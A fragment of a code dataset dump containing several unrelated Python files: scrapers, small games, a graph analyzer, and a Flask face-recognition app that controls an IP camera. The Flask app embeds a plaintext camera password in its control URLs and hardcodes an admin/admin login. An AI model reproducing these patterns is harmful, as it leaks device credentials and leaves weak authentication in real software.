language=language).result[\"id\"]\n\n if profs is not None:\n for professor in profs.find_all(\"a\"):\n professor_code = re.search(\"fitxaProf\\('(\\d+)'\\)\", professor[\"href\"])[1]\n professor_code = await fetch_professor(conn,\n degree_code=degree_code,\n year=year,\n professor_code=professor_code)\n\n\n if None not in [class_group_id, professor_code]:\n Persistent(conn, \"class_group_professor\",\n class_group_id=class_group_id,\n professor_code=professor_code)\n\n\nasync def scrap_subject(conn, degree_code=None, subject_code=None, year=None):\n # We need to scrap plans before schedule because of foreign key constraints in the database\n await scrap_plan(conn=conn, degree_code=degree_code, subject_code=subject_code, year=year)\n\n await asyncio.gather(\n asyncio.create_task(\n scrap_schedule(conn, degree_code=degree_code, subject_code=subject_code, year=year, semester=1)),\n asyncio.create_task(\n scrap_schedule(conn, degree_code=degree_code, subject_code=subject_code, year=year, semester=2))\n )\n\n\nasync def scrap_degree_year(conn, code, current_year, type):\n # get subject codes:\n subject_list_url = \"http://www.ub.edu/grad/infes/fitxaInfe.jsp?n0=L&n1=0&n2=1&ens={}&curs={}&tipus={}\" \\\n .format(code, current_year, type)\n\n # http://www.ub.edu/grad/infes/fitxaInfe.jsp?n0=L&n1=0&n2=1&curs=2018&ens=TG1077\n\n try:\n subject_list_text = await fetch(url=subject_list_url, method=\"GET\")\n if subject_list_text is None: return\n except ClientConnectorError as e:\n print(str(e))\n return\n\n subject_list_soup = BeautifulSoup(subject_list_text, \"html.parser\")\n degree_name = subject_list_soup.find(\"td\", class_=\"titol_pagina\").text.strip()\n if degree_name:\n Persistent(conn, \"degree\", pkey=[\"code\"], code=code, name=degree_name)\n\n subject_tasks = []\n\n for tr in subject_list_soup.find_all(\"tr\"):\n ioAssigCodi = tr.find(\"td\", class_=\"ioAssigCodi\")\n ioAssigDesc = tr.find(\"td\", class_=\"ioAssigDesc\")\n ioAssigCredits = tr.find(\"td\", class_=\"ioAssigCredits\")\n if None in [ioAssigCodi, ioAssigDesc, ioAssigCredits]:\n continue\n\n subject_code = ioAssigCodi.text.strip()\n\n Persistent(conn, \"subject\",\n pkey=[\"code\"],\n code=subject_code,\n name=ioAssigDesc.text.strip(),\n credits=ioAssigCredits.text.strip())\n\n Persistent(conn, \"degree_subject\", pkey=[\"degree_code\", \"subject_code\"],\n degree_code=code,\n subject_code=subject_code,\n type=type)\n\n subject_tasks.append(\n asyncio.create_task(\n scrap_subject(conn=conn, degree_code=code, subject_code=subject_code, year=current_year)\n )\n )\n\n await asyncio.gather(*subject_tasks)\n\n\nasync def main():\n year_range = [2019, 2018, 2017]\n\n tasks = []\n for i in [1042, 1077]: # range(1000, 1110): # range(1077, 1078):\n for year in year_range:\n for type in [\"FB\", \"OB\", \"OT\", \"TR\", \"PR\"]:\n tasks.append(\n asyncio.create_task(\n scrap_degree_year(conn=conn, code=\"TG{}\".format(i), current_year=year, type=type)\n )\n )\n await asyncio.gather(*tasks)\n\n\nif __name__ == \"__main__\":\n params = config()\n conn = psycopg2.connect(**params)\n\n sem_tokens = input(\"Semaphore limit? (15) \")\n if sem_tokens == \"\":\n sem_tokens = 15\n sem = asyncio.Semaphore(int(sem_tokens))\n\n loop = asyncio.get_event_loop()\n asyncio.set_event_loop(loop)\n loop.run_until_complete(main())\n\n conn.close()\n","repo_name":"3nr1c/grad-db","sub_path":"scrapper/app/grad.py","file_name":"grad.py","file_ext":"py","file_size_in_byte":10672,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"429628890","text":"\nfrom game.game_state import GameState\n\nimport pygame\nfrom game.constants import *\nfrom game.game_state import *\nfrom game.gui.button import Button\n\nclass ScoreboardMenu(GameState):\n def __init__(self, type, game, paused = False):\n super().__init__(type, game, paused)\n\n self.font_14 = self.game.assets_manager.get_asset(\"PixelFont14\").asset_load\n\n self.back_button = Button(\n game,\n \"Voltar\",\n self.font_14, \n 640-60, 600, \n 120, 40, \n (200, 100, 30),\n (190, 90, 20), \n (170, 80, 20))\n\n def update(self):\n \n # Set background\n self.game.render.fill_screen(COLOR_BACKGROUND)\n\n font18 = self.game.assets_manager.get_asset(\"PixelFont18\").asset_load\n font14 = self.game.assets_manager.get_asset(\"PixelFont14\").asset_load\n self.game.render.render_text_centered(\"Top 10 jogadores\", 640, 80, (245, 245, 245), font18)\n\n # Rendering the scores tables\n score_text_width = 305\n score_text_pos_x = 50\n\n for i in range(0, 4):\n \n num_of_rings = i+3\n\n # Top title, num of rings\n self.game.render.render_text(f\"{num_of_rings} anéis\", score_text_pos_x, 160, COLOR_YELLOW, font18)\n\n # Getting data\n scores = self.game.config_manager.get_score_by_rings_amount(num_of_rings)\n\n score_text_pos_y = 200\n\n if(len(scores) == 0):\n self.game.render.render_text(\"Ninguém jogou.\", score_text_pos_x, score_text_pos_y, (100, 100, 100), font14)\n score_text_pos_x += score_text_width\n continue\n\n for score in scores:\n score_name = score[0]\n score_number = score[1]\n\n self.game.render.render_text(score_name, score_text_pos_x, score_text_pos_y, (245, 245, 245), font14)\n self.game.render.render_text_right(str(score_number), score_text_pos_x+score_text_width-40, score_text_pos_y, (245, 245, 245), font14)\n\n score_text_pos_y += 25\n \n score_text_pos_x += score_text_width\n\n if(self.back_button.draw()):\n self.game.state_manager.pause_state(\"ScoreboardMenu\")\n self.game.state_manager.unpause_state(\"MainMenu\")\n","repo_name":"dansch0/tower-of-hanoi","sub_path":"game/states/scoreboard_menu.py","file_name":"scoreboard_menu.py","file_ext":"py","file_size_in_byte":2344,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"7530198618","text":"\"\"\"\r\nFile: bouncing_ball\r\nName:Mona Lai\r\n-------------------------\r\nThis program is an animation, show throw the ball process.\r\nOne people only can throw three times.\r\n\"\"\"\r\n\r\nfrom campy.graphics.gobjects import GOval\r\nfrom campy.graphics.gwindow import GWindow\r\nfrom campy.gui.events.timer import pause\r\nfrom campy.gui.events.mouse import onmouseclicked\r\n\r\nVX = 3\r\nDELAY = 10\r\nGRAVITY = 1\r\nSIZE = 20\r\nREDUCE = 0.9\r\nSTART_X = 30\r\nSTART_Y = 40\r\n\r\nwindow = GWindow(800, 500, title='bouncing_ball.py')\r\nball = GOval(SIZE, SIZE, x=START_X, y=START_Y)\r\nball.filled = True\r\nis_ball_moving = False\r\n\r\n\r\n\r\ndef main():\r\n \"\"\"\r\n This program simulates a bouncing ball at (START_X, START_Y)\r\n that has VX as x velocity and 0 as y velocity. Each bounce reduces\r\n y velocity to REDUCE of itself.\r\n \"\"\"\r\n global is_ball_moving\r\n ball.filled = True\r\n window.add(ball)\r\n vy = 0\r\n count = 0\r\n onmouseclicked(start)\r\n\r\n while True:\r\n if is_ball_moving and count < 3:\r\n ball.move(VX, vy)\r\n vy += GRAVITY\r\n if ball.y + ball.height > window.height:\r\n if vy > 0:\r\n vy *= -REDUCE\r\n if ball.x > window.width:\r\n vy = 0\r\n ball.x = START_X\r\n ball.y = START_Y\r\n is_ball_moving = False\r\n count += 1\r\n pause(DELAY)\r\n\r\n\r\ndef start(event):\r\n global is_ball_moving\r\n is_ball_moving = True\r\n\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"Mona0104/MyStanCodeProjects","sub_path":"MystanCode_Project/Drawing/bouncing_ball.py","file_name":"bouncing_ball.py","file_ext":"py","file_size_in_byte":1510,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"7001029895","text":"#!/usr/bin/env python\r\n# -*- encoding: utf-8 -*-\r\n'''\r\n@File : test.py\r\n@Time : 2020/07/01 12:57:18\r\n@Author : 艾强云\r\n@Contact : aqy0716@163.com\r\n@Department : SCAU \r\n@Desc : None\r\n'''\r\n\r\n# here put the import lib\r\na=[1,2,3,4,5]\r\nc=a[4:5]\r\n\r\nprint(c)","repo_name":"huoweikong/vscode-python-kiton","sub_path":"实验室数据分析/序列分析/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":303,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"10036108470","text":"from setuptools import setup, find_packages\n\nwith open(\"README.md\", \"r\", encoding=\"utf-8\") as fh:\n long_description = fh.read()\n\nwith open(\"requirements.txt\", \"r\") as f:\n requirements = f.readlines()\n\nsetup(\n name='reactive-uart2ip',\n version='0.2.1',\n author=\"Gianluca Scopelliti\",\n author_email=\"gianlu.1033@gmail.com\",\n description=\"TCP server that mediates UART serial communication\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/AuthenticExecution/reactive-uart2ip\",\n packages=find_packages(),\n install_requires=requirements,\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: POSIX :: Linux\",\n ],\n python_requires='>=3.6',\n entry_points={\n 'console_scripts': ['reactive-uart2ip = uart2ip.main:main']\n },\n)\n","repo_name":"AuthenticExecution/reactive-uart2ip","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":924,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"32232409530","text":"from flask import Flask, render_template, Response, request,redirect,url_for\nimport cv2\nfrom AttedanceProject import VideoCamera\nimport requests\napp = Flask(__name__)\n\n#camera = cv2.VideoCapture('http://192.168.2.10:21866/videostream.cgi?user=admin&pwd=gigirivas',cv2.CAP_FFMPEG)\n \n#camera = cv2.VideoCapture(0) # use 0 for web camera\n#for cctv camera use rtsp://username:password@ip_address:554/user=username_password='password'_channel=channel_number_stream=0.sdp' instead of camera\n# for local webcam use cv2.VideoCapture(0)\n\napp.route('/Download')\ndef download_file ():\n #For windows you need to use drive name [ex: F:/Example.pdf]\n path = \"home/pi/Desktop/FaceRecognitionProject/Attendance.csv\"\n return send_file(path, as_attachment=True)\n\ndef gen_frames(): # generate frame by frame from camera\n CameraObj = VideoCamera()\n while True:\n frame = CameraObj.FaceRecognition()\n yield (b'--frame\\r\\n'\n b'Content-Type: image/jpeg\\r\\n\\r\\n' + frame + b'\\r\\n') # concat frame one by one and show result\n\n\n@app.route('/video_feed')\ndef video_feed():\n #Video streaming route. Put this in the src attribute of an img tag\n return Response(gen_frames(), mimetype='multipart/x-mixed-replace; boundary=frame')\n\n@app.route('/buttonUP')\ndef up():\n Up=requests.get('http://192.168.2.2:29626/decoder_control.cgi?loginuse=admin&loginpas=gigirivas&onestep=1&command=0') \n print(\"UP PRESSED\")\n print(Up.status_code, Up.reason)\n return (''),204\n@app.route('/buttonDOWN')\ndef down():\n Down=requests.get('http://192.168.2.2:29626/decoder_control.cgi?loginuse=admin&loginpas=gigirivas&onestep=1&command=2')\n print(\"DOWN PRESSED\")\n print(Down.status_code, Down.reason)\n return (''),204\n@app.route('/buttonLEFT')\ndef left():\n Left=requests.get('http://192.168.2.2:29626/decoder_control.cgi?loginuse=admin&loginpas=gigirivas&onestep=1&command=4')\n print(\"LEFT PRESSED\")\n \n return (''),204\n@app.route('/buttonRIGHT')\ndef right():\n Right=requests.get('http://192.168.2.2:29626/decoder_control.cgi?loginuse=admin&loginpas=gigirivas&onestep=1&command=6') \n print(\"RIGHT PRESSED\")\n \n return (''),204\n# @app.route('/index',methods=['GET', 'POST'])\n# def index():\n# if request.method == 'POST':\n# if request.form['up'] == 'Do Something':\n# print(\"CAMERA LOOK UP ONE STEP\")\n# elif request.form['down'] == 'Do Something Else':\n# print(\"CAMERA LOOK DOWN ONE STEP\")\n# else:\n# pass # unknown\n# elif request.method == 'GET':\n# print('get')\n# \"\"\"Video streaming home page.\"\"\"\n #return render_template('index.html')\n\n\n# Route for handling the login page logic\n@app.route('/', methods=['GET', 'POST'])\ndef login():\n error = None\n if request.method == 'POST':\n if request.form['username'] != 'admin' or request.form['password'] != 'admin':\n error = 'Invalid Credentials. Please try again.'\n else:\n return render_template('index.html')\n #return redirect(url_for('index'))\n return render_template('login.html', error=error)\n\nif __name__ == '__main__':\n\n app.run(host='0.0.0.0',port=5000,debug=True,threaded=True)","repo_name":"Ddimitrako/Face-Recognition-Attendance-System","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3232,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"10060315718","text":"from prefect.deployments import Deployment\nfrom prefect.infrastructure.docker import DockerContainer\nfrom gcs_to_bq import etl_gcs_to_bq\n\ndocker_block = DockerContainer.load(\"steam-docker\")\n\ndocker_dep = Deployment.build_from_flow(\n flow=etl_gcs_to_bq,\n name=\"docker-bq-flow\",\n infrastructure=docker_block,\n)\n\nif __name__ == \"__main__\":\n docker_dep.apply()","repo_name":"aliescont/dezoomcamp-project","sub_path":"prefect/flows/docker-bq-deploy.py","file_name":"docker-bq-deploy.py","file_ext":"py","file_size_in_byte":368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"36504191400","text":"# -*- coding: utf-8 -*-\nimport scrapy\nimport json\nfrom bs4 import BeautifulSoup\nfrom magistral.items import Product\nfrom scrapy.loader import ItemLoader\n\nproduct_item = Product()\n\n\nclass MagistralSpider(scrapy.Spider):\n name = 'mst'\n allowed_domains = ['magistral-nn.ru']\n\n def start_requests(self):\n SECTION_ID = ['23483', '23484', '23485', '23486', '23487', '23488', '23489', '23490', '23491', '23492',\n '23496', '23497', '23498', '23512', '23513', '23522', '23523', '23524', '23525', '23526', '23527', '23528', '23529']\n for param in SECTION_ID:\n yield scrapy.FormRequest(f'https://www.magistral-nn.ru/automag/?SECTION_ID={param}&getdata=true&nd=1616783290021&_search=true&nd=1616786082075&rows=50&page=1&sidx=id&sord=asc&name=%D0%92%D0%90%D0%97',\n callback=self.parse, method='GET')\n\n def build_images_url(self, text):\n full_url = 'https://www.magistral-nn.ru' + text\n return full_url\n\n def parse(self, response):\n page = json.loads(response.text)['page']\n total = json.loads(response.text)['total']\n navigation_categories = json.loads(response.text)['cat']\n for row in json.loads(response.text)['rows']:\n loader = ItemLoader(item=Product(), selector=row)\n cols = row['cell'][6]\n soupe = BeautifulSoup(cols, 'lxml')\n if row['cell'][0]:\n part_url_big_img = BeautifulSoup(row['cell'][0], 'lxml').select('span')[0]['data-dp']\n full_url_big_img = self.build_images_url(part_url_big_img)\n name_image = part_url_big_img.strip('/upload/prod_images/catalog/')[:-2]\n else:\n full_url_big_img = 'NONE'\n name_image = 'NONE'\n reformat_description = soupe.get_text()\n categories = str(navigation_categories) + str(reformat_description)\n print('input ITEM')\n print(categories)\n loader.add_value('title', reformat_description[-4:])\n loader.add_value('price', row['cell'][9])\n loader.add_value('balance', row['cell'][8])\n loader.add_value('description', reformat_description)\n loader.add_value('producer', row['cell'][13])\n loader.add_value('model_auto', reformat_description[-7:-3])\n loader.add_value('navigation_categories', categories)\n #loader.add_value('images', row['cell'][0])\n loader.add_value('image_alt', 'img_hex')\n loader.add_value('image_urls', full_url_big_img)\n loader.add_value('product_url', name_image)\n yield loader.load_item()\n page += 1\n if int(page) < 2:\n yield scrapy.FormRequest(\n f'https://www.magistral-nn.ru/automag/?SECTION_ID=23483&getdata=true&nd=1616783290021&_search=true&nd=1616786082075&rows=50&page={page}&sidx=id&sord=asc&name=%D0%92%D0%90%D0%97',\n callback=self.parse, method='GET')\n print('========= KONEC ================')","repo_name":"maxs2x/crawl_for_shop","sub_path":"magistral/spiders/magistral.py","file_name":"magistral.py","file_ext":"py","file_size_in_byte":3058,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"9979023985","text":"#title#\r\n# 区間和の最大値\r\n#subtitle#\r\n# 区間和を累積和の差分としてその最大値を求めるar-al\r\n\r\n#name#\r\n# 区間和の最大値\r\n#description#\r\n# 区間和を累積和の差分としてその最大値を求めるar-al\r\n#body#\r\n\r\nclass Imos:\r\n def __init__(self, a:list):\r\n self.origin = a\r\n self.accum = [0]\r\n for ai in a:\r\n self.accum.append(self.accum[-1] + ai)\r\n self.n = self.accum\r\n self.INF = float('inf')\r\n\r\n def _get_max(self, accum:list):\r\n \"\"\"\r\n 区間和(ar-al)の最大値\r\n max(ar-min(al))\r\n \"\"\"\r\n ret_min = - self.INF\r\n min_al = self.INF\r\n for ar in accum:\r\n ret_min= max(ar - min_al, ret_min)\r\n min_al = min(ar, min_al)\r\n return ret_min\r\n\r\n @property\r\n def get_max(self):\r\n return self._get_max(self.accum)\r\n\r\n @property\r\n def get_min(self):\r\n return - self._get_max([-ai for ai in self.accum])\r\n\r\n\r\nn = int(input())\r\na = list(map(int, input().split()))\r\nfor i, ai in enumerate(a):\r\n if ai==0:\r\n a[i] = -1\r\n\r\nim = Imos(a)\r\nprint(im.get_max - im.get_min + 1)\r\n\r\n\r\n#prefix#\r\n# Lib_A_区間和の最大値\r\n#end#\r\n","repo_name":"ibtosmlin/atcoder","sub_path":"lib/lib/Lib_A_区間和の最大値.py","file_name":"Lib_A_区間和の最大値.py","file_ext":"py","file_size_in_byte":1219,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"71411164599","text":"from stacks_and_queues.stack import Stack\nimport copy\n\n\n# Time/Space O(n)\ndef find_min_max(stack, pos):\n aux = copy.copy(stack) # copy over here\n i, min, max = 0, None, None\n size = aux.size\n while i < size - pos:\n value = aux.pop()\n if i >= pos:\n if max is None or value > max:\n max = value\n if min is None or value < min:\n min = value\n i += 1\n return min, max\n\n\ndef sort_stack(stack):\n i, j = 0, int(stack.size/2)\n size = stack.size\n while i < j:\n min, max = find_min_max(stack, i)\n k = 0\n aux = Stack()\n while k <= size:\n if k == size - i:\n aux.push(max)\n else:\n value = stack.pop()\n if value != max:\n aux.push(value)\n k += 1\n k = 0\n stack = Stack()\n while k <= size:\n if k == size - i:\n stack.push(min)\n else:\n value = aux.pop()\n if value != min:\n stack.push(value)\n k += 1\n i += 1\n return stack\n\n\n# Space O(n). Time O(n^2)\ndef sort_stack2(stack):\n changes = 0\n is_max = True\n while changes < stack.size - 1 or not is_max:\n aux = Stack()\n changes = 0\n max_min = stack.pop()\n while not stack.is_empty():\n v = stack.pop()\n if (is_max and v > max_min) or (not is_max and v < max_min):\n max_min, v = v, max_min\n changes += 1\n aux.push(v)\n aux.push(max_min)\n stack = aux\n is_max = not is_max\n return stack\n\n\n# Tests:\n# stack = Stack()\n# stack.push(3)\n# stack.push(2)\n# stack.push(4)\n# stack.push(1)\n# stack.push(6)\n# stack.push(5)\n# print(stack)\n# print(sort_stack2(stack))\n","repo_name":"brunoliberal/exercises","sub_path":"stacks_and_queues/sort_stack.py","file_name":"sort_stack.py","file_ext":"py","file_size_in_byte":1848,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"38181061993","text":"from graph_tool.all import *\nfrom time import gmtime, strftime\nfrom enum import Enum\nfrom utils.unconnected_graphs import UnconnectedGraphs\n\nimport argparse\nimport sys\nimport math\nimport os\nimport itertools\n\nDEFAULT_OUTPUT_DIR = \"../out/\"\nHELP_INFO_MSG = \"Try 'graph_analyzer -h' for more information.\"\n\n\ndef print_graph_vertex(graph: Graph, vertex: int):\n \"\"\"\n Prints some information about the given node (a.k.a. vertex).\n 'in-degree': The number of edges to parent nodes.\n 'out-degree': The number of edges to child nodes.\n 'value': The name of the node.\n\n :param graph: the graph to print\n :param vertex: optional list of vertices to print out\n \"\"\"\n print(\"vtx[%s]\" % vertex,\n \"in:\", graph.vertex(vertex).in_degree(),\n \"out:\", graph.vertex(vertex).out_degree(),\n \"val:\", graph.vp.vertex_name[vertex])\n\n\ndef print_vertex_children(graph: Graph, vertex: int, degree=1):\n \"\"\"\n Prints the given vertex and all its (sub-)children in a tree-like structure.\n\n :param graph: the graph which contains the given vertex\n :param vertex: the vertex index of the parent node to print\n :param degree: the degree of sub-children to print\n \"\"\"\n BRANCH_FORK = \"├─ \"\n BRANCH_END = \"└─ \"\n BRANCH_SELF = \"● \"\n TREE_TRUNK = \"│ \"\n TREE_EPMTY = \" \"\n\n def print_recursive(vtx: int, deg=1, indent=\"\", branch=\"\"):\n out_degree = graph.vertex(vtx).out_degree()\n print(\"%s%svtx[%s]\" % (indent, branch, vtx),\n \"in:\", graph.vertex(vtx).in_degree(),\n \"out:\", out_degree,\n \"val:\", graph.vp.vertex_name[vtx])\n\n if branch == BRANCH_FORK:\n indent += TREE_TRUNK\n elif branch == BRANCH_END:\n indent += TREE_EPMTY\n\n if out_degree and deg:\n for child in graph.get_out_neighbours(vtx)[:-1]:\n if child == vtx:\n if not branch:\n branch += BRANCH_FORK\n print(\"%s%svtx[%s]\" % (indent, branch[:-2] + BRANCH_SELF, child),\n \"in:\", graph.vertex(child).in_degree(),\n \"out:\", out_degree,\n \"val:\", graph.vp.vertex_name[child])\n else:\n print_recursive(child, deg - 1, indent, BRANCH_FORK)\n\n child = int(graph.get_out_neighbours(vtx)[-1:])\n if child == vtx:\n if not branch:\n branch += BRANCH_END\n print(\"%s%svtx[%s]\" % (indent, BRANCH_END[:-2] + BRANCH_SELF, child),\n \"in:\", graph.vertex(child).in_degree(),\n \"out:\", out_degree,\n \"val:\", graph.vp.vertex_name[child])\n else:\n print_recursive(child, deg - 1, indent, BRANCH_END)\n\n print_recursive(vertex, degree)\n\n\ndef search_vertices(graph: Graph, search_str: str) -> set:\n \"\"\"\n Searches for nodes which contain the given search string (case sensitive).\n\n :param graph: the graph containing the nodes\n :param search_str: the string to search for in the node name\n :return: a set of the found vertices or a empty set\n \"\"\"\n vtx_list = []\n for vtx in graph.vertices():\n vtx_value = graph.vp.vertex_name[vtx]\n if vtx_value.find(search_str) != -1:\n vtx_list.append(vtx)\n return vtx_list\n\n\ndef find_hotspots_out(graph: Graph, top_length=0) -> list:\n \"\"\"\n Finds the top nodes with most outgoing connections to other nodes (\"hotspots\").\n\n :param graph: the graph containing the given nodes\n :param top_length: return the top N results or the top log2(graph_size)+1 if no parameter was given\n :return: a list of nodes with the top most connections\n \"\"\"\n if top_length <= 0:\n top_length = int(math.log2(len(graph.get_vertices()))) + 1 # use log2 to hold the result list small\n\n vtx_list = list(graph.vertices())\n vtx_list.sort(key=lambda vertex: vertex.out_degree(), reverse=True)\n del vtx_list[top_length:]\n\n return vtx_list\n\n\ndef find_hotspots_in(graph: Graph, top_length=0) -> list:\n \"\"\"\n Finds the top nodes with most ingoing connections to other nodes (\"hotspots\").\n\n :param graph: the graph containing the given nodes\n :param top_length: return the top N results or the top log2(graph_size)+1 if no parameter was given\n :return: a list of nodes with the top most connections\n \"\"\"\n if top_length <= 0:\n top_length = int(math.log2(len(graph.get_vertices()))) + 1 # use log2 to hold the result list small\n\n vtx_list = list(graph.vertices())\n vtx_list.sort(key=lambda vertex: vertex.in_degree(), reverse=True)\n del vtx_list[top_length:]\n\n return vtx_list\n\n\ndef print_cycles(graph: Graph):\n \"\"\"\n Check if graph is a directed acyclic graph (DAG).\n If this is not the case, all cycles in the graph are printed, together with a small statistic about cycle lengths.\n\n :param graph: input graph\n \"\"\"\n if is_DAG(graph):\n print(\"Graph is a DAG. No cycles found!\")\n return\n else:\n print(\"Graph is not a DAG.\")\n cycles = list(all_circuits(graph))\n cycles_by_length = dict()\n for c in cycles:\n if len(c) not in cycles_by_length:\n cycles_by_length[len(c)] = list()\n cycles_by_length[len(c)].append(c)\n\n print(\"Cycles:\")\n print()\n for i in sorted(cycles_by_length.keys()):\n for c in cycles_by_length[i]:\n print(c, end=\": \")\n print(graph.vp.vertex_name[c[0]], end=\"\")\n for v in c[1:]:\n print(\" -> {}\".format(graph.vp.vertex_name[v]), end=\"\")\n print()\n\n print()\n print(\"Found {} cycles in the graph.\".format(len(cycles)))\n print()\n print(\"Number of cycles by length:\")\n print(\"Length | #\")\n print(\"-------+---\")\n for i in sorted(cycles_by_length.keys()):\n print(\"{:>6} | {:<}\".format(i, len(cycles_by_length[i])))\n\n\ndef collect_subgraph_vertices(graph: Graph, root_idx: int) -> set:\n \"\"\"\n Collects all children and sub-children of an given node and return a set of its indices.\n In case of cyclic dependencies, the internal use of a `set` prevents a endless duplication of the nodes in the\n output.\n\n :param graph: the input graph\n :param root_idx: the root index of the sub-graph\n :return: a set with all node indices of the sub-graph\n \"\"\"\n vtx_set = set()\n\n def traverse_recursive(vtx: int):\n vtx_set.add(vtx)\n out_degree = graph.vertex(vtx).out_degree()\n if out_degree:\n for child in graph.get_out_neighbours(vtx):\n if child not in vtx_set and child != vtx: # ignore self references and cyclic dependencies\n traverse_recursive(child)\n\n traverse_recursive(root_idx)\n return vtx_set\n\n\nclass SelectionMode(Enum):\n ALL = 0\n INDEPENDENT = 1\n\n\ndef detect_subgraphs(graph: Graph, is_verbose=True, selection=SelectionMode.ALL):\n \"\"\"\n Detects sub-graphs in the given input graph.\n\n :param graph: the input graph\n :param is_verbose: prints output in human readable form or as raw vertex indices for automated processing/piping\n :param selection: the enum which defines the kind of sub-graphs to be printed\n `ALL`: all detected sub-graphs which may also contain further sub-graphs\n `INDEPENDENT`: only sub-graphs without any other sub-graphs in it\n \"\"\"\n indie_nodes = max_independent_vertex_set(graph)\n sub_roots = []\n for vtx in graph.vertices():\n # check if vertex is a subgraph-root and not a leave-node\n if not indie_nodes[vtx] and graph.vertex(vtx).out_degree() > 0:\n sub_roots.append(int(vtx))\n\n def find_related_sub() -> list:\n related_subgraphs_list = []\n for v in sub_roots:\n sub_children = collect_subgraph_vertices(graph, v)\n sub_children.remove(v) # remove root-node\n\n for sub_vtx in sub_roots:\n if sub_vtx in sub_children:\n related_subgraphs_list.append(v)\n break\n return related_subgraphs_list\n\n if is_verbose: # human readable output\n if selection == SelectionMode.ALL:\n print(\"Found %s sub-graphs:\" % len(sub_roots))\n for vtx in sub_roots:\n sub = collect_subgraph_vertices(graph, vtx)\n sub.remove(vtx) # remove root-node\n print(\"sub[%s]\" % vtx, \"has\", len(sub), \"children, val:\", graph.vp.vertex_name[vtx])\n\n for vtx_sub in sub_roots:\n if vtx_sub in sub:\n print(\"\\t - includes sub[%s]\" % vtx_sub, \" val:\", graph.vp.vertex_name[vtx_sub])\n\n elif selection == SelectionMode.INDEPENDENT:\n independent_sub_list = []\n related_sub_list = find_related_sub()\n for vtx in sub_roots:\n if vtx not in related_sub_list:\n independent_sub_list.append(vtx)\n print(\"Found %s independent sub-graphs:\" % len(independent_sub_list))\n for vtx in independent_sub_list:\n print(\"sub[%s]\" % vtx, \"val:\", graph.vp.vertex_name[vtx])\n\n else: # raw output which could be piped in shell\n if selection == SelectionMode.ALL:\n for vtx in sub_roots:\n print(\"%s \" % vtx, end=\"\")\n elif selection == SelectionMode.INDEPENDENT:\n related_sub_list = find_related_sub()\n for vtx in sub_roots:\n if vtx not in related_sub_list:\n print(\"%s \" % vtx, end=\"\")\n\n\ndef find_subgraphs(graph: Graph) -> dict:\n \"\"\"\n Searches in the given graph for sub-graphs. The root of an sub-graph is determined by the\n `max_independent_vertex_set()`-function provided by graph-tools.\n\n :param graph: the graph to search in for sub-graphs\n :return: a list of the found sub-graphs\n \"\"\"\n indie_nodes = max_independent_vertex_set(graph)\n reduced_list = filter(lambda v: False if indie_nodes[v] else True, graph.vertices())\n subgraph_dict = {}\n\n for vtx in reduced_list:\n filter_prop = graph.new_vertex_property(\"bool\")\n sub_set = collect_subgraph_vertices(graph, vtx)\n\n for child in sub_set:\n filter_prop.a[int(child)] = True\n\n subgraph = GraphView(graph, vfilt=filter_prop)\n\n # mark the root node with a different color\n subgraph.vp[\"root\"] = subgraph.new_vertex_property(\"bool\")\n subgraph.vp[\"root\"].a[int(vtx)] = True\n\n subgraph_dict[int(vtx)] = subgraph\n\n return subgraph_dict\n\n\ndef export_circle_diagram(graph: Graph, file_name: str):\n \"\"\"\n Exports the given graph into the `../out/`-directory as `.png`-file. Since this call may take a long time to\n compute, it should be used carefully.\n\n :param graph: the input graph\n :param file_name: the name of the exported *.svg-file\n \"\"\"\n if not os.path.isdir(DEFAULT_OUTPUT_DIR):\n os.mkdir(DEFAULT_OUTPUT_DIR)\n\n state = minimize_nested_blockmodel_dl(graph, deg_corr=True)\n draw_hierarchy(state, output=DEFAULT_OUTPUT_DIR + file_name + \".png\") # *.svg works as well\n\n\ndef export_subgraph(graph: Graph, sub_vtx: int, file_name: str):\n \"\"\"\n Exports the given sub-graph into the `../out/`-directory as `.svg`-file. Since this call may take a long time to\n compute, it should be used carefully.\n\n :param graph: the input graph\n :param sub_vtx: the root node of the sub-graph\n :param file_name: the name of the exported *.svg-file\n \"\"\"\n if not os.path.isdir(DEFAULT_OUTPUT_DIR):\n os.mkdir(DEFAULT_OUTPUT_DIR)\n\n sub = get_subgraph(graph, sub_vtx)\n pos = radial_tree_layout(graph, graph.vertex(sub_vtx))\n\n graph_draw(sub,\n pos=pos,\n vertex_fill_color='#8ae234cc', # rrggbbaa\n vertex_shape=\"square\",\n vertex_text=sub.vp.vertex_name,\n output=DEFAULT_OUTPUT_DIR + file_name + \".svg\")\n\n\ndef get_subgraph(graph: Graph, sub_vtx) -> GraphView:\n \"\"\"\n Gets the given sub-graph from the source graph and stores the result in a new `GraphView` object. This function\n can be used recursive on it's self.\n\n :param graph: the input graph\n :param sub_vtx: the root node of the sub-graph\n :return: a new `GraphView` with the children of the given sub-graph\n \"\"\"\n sub_set = collect_subgraph_vertices(graph, sub_vtx)\n filter_prop = graph.new_vertex_property(\"bool\")\n for vtx in graph.vertices():\n if vtx in sub_set:\n filter_prop.a[int(vtx)] = True\n\n return GraphView(graph, vfilt=filter_prop)\n\n\ndef list_shared_sub_vertices(graph: Graph, vtx_a: int, vtx_b: int) -> list:\n \"\"\"\n 